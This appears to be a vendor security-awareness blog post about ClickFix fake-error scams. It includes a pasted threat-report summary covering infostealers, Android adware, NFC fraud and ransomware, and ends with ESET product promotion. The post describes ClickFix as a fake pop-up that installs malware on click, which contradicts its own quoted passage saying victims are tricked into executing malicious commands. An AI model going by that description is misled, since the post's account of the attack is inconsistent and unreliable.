What is ClickFix and how do you stop it?

ClickFix is a growing cyberthreat cybercriminals use, a misleading technique, to fool users into installing malicious software. This type of social engineering assault typically takes the form of a phony software update or browser, typically displaying a pop-up with the message "Your browser is out of date" or "Click here to fix the issue."

These phony warnings may appear authentic, but their purpose is to trick you into clicking without thinking. After clicking, the user might unintentionally install spyware, adware, or malware that could damage their device or steal private data.

How Does ClickFix Work?

From novel social engineering techniques to sophisticated mobile threats and major infostealer disruptions, the threat landscape in the first half of 2025 was anything but boring.

One of the most striking developments this period was the emergence of ClickFix, a new, deceptive attack vector that skyrocketed by over 500% compared to H2 2024 in ESET telemetry. Now the second most common attack vector after phishing, ClickFix manipulates internet users into executing malicious commands under the guise of fixing a fake error. The payloads at the end of ClickFix attacks vary widely – from infostealers to ransomware and even to nation-state malware – making this a versatile and formidable threat across Windows, Linux, and macOS.

The infostealer landscape also saw significant shifts. With Agent Tesla fading into obsolescence, SnakeStealer (also known as Snake Keylogger) surged ahead, becoming the most detected infostealer in our telemetry. Meanwhile, ESET contributed to major disruption operations targeting Lumma Stealer and Danabot, two prolific malware-as-a-service threats.

On the Android front, adware detections soared by 160%, driven largely by a sophisticated new threat dubbed Kaleidoscope. This malware uses a deceptive “evil twin” strategy to distribute malicious apps that bombard users with intrusive ads, degrading device performance. At the same time, NFC-based fraud shot up more than thirty-five-fold, fueled by phishing campaigns and inventive relay techniques. While the overall numbers remain modest, this jump highlights the rapid evolution of the criminals’ methods and their continued focus on exploiting NFC technology. Each new iteration of NFC threats – from NGate to GhostTap, and most recently SuperCard – demonstrates how attackers adapt to new security measures.

The ransomware scene descended (even further) into chaos, with fights between rival ransomware gangs impacting several players including the top ransomware as a service – RansomHub. Yearly data from 2024 shows that while ransomware attacks and the number of active gangs have grown, ransom payments saw a significant drop. This discrepancy may be the result of takedowns and exit scams that reshuffled the ransomware scene in 2024, but also partially due to diminished confidence in the gangs’ ability to keep their side of the bargain.

1. You're online when a pop-up window tells you to upgrade your browser or correct a problem.

   
   

2. The alert is a hoax, yet it seems authentic enough to trick a lot of people.

   
   

3. Malicious malware is downloaded to your device when you click.

   
   

4. This program might monitor your activities, provide intrusive advertisements, or potentially steal banking information and passwords.

 Who Is in Danger?

 ClickFix frauds are common and can affect:

• People using desktop and mobile devices for surfing.

• Companies whose workers might inadvertently deploy malware.

• Businesses without adequate endpoint protection in place.

 How to Protect Yourself from ClickFix Attacks

Awareness is the first defense. Being cautious with links, especially those promising a quick fix, is crucial. Understanding where a support message comes from and verifying its authenticity can prevent a major breach. It’s also important to ensure systems don’t automatically run instructions from URLs, and that both individual users and IT teams are trained to identify suspicious behavior.

Technology plays a major role in staying protected. With ESET’s multilayered security approach, threats like ClickFix can be identified and blocked before they take hold. ESET Endpoint Security don’t just detect known threats — they analyze behavior, monitor link activity, and respond to suspicious actions in real time.

ClickFix attacks are a reminder that even helpful tools can be turned into threats. But with the right knowledge and the right protection, you can stay ahead of attackers.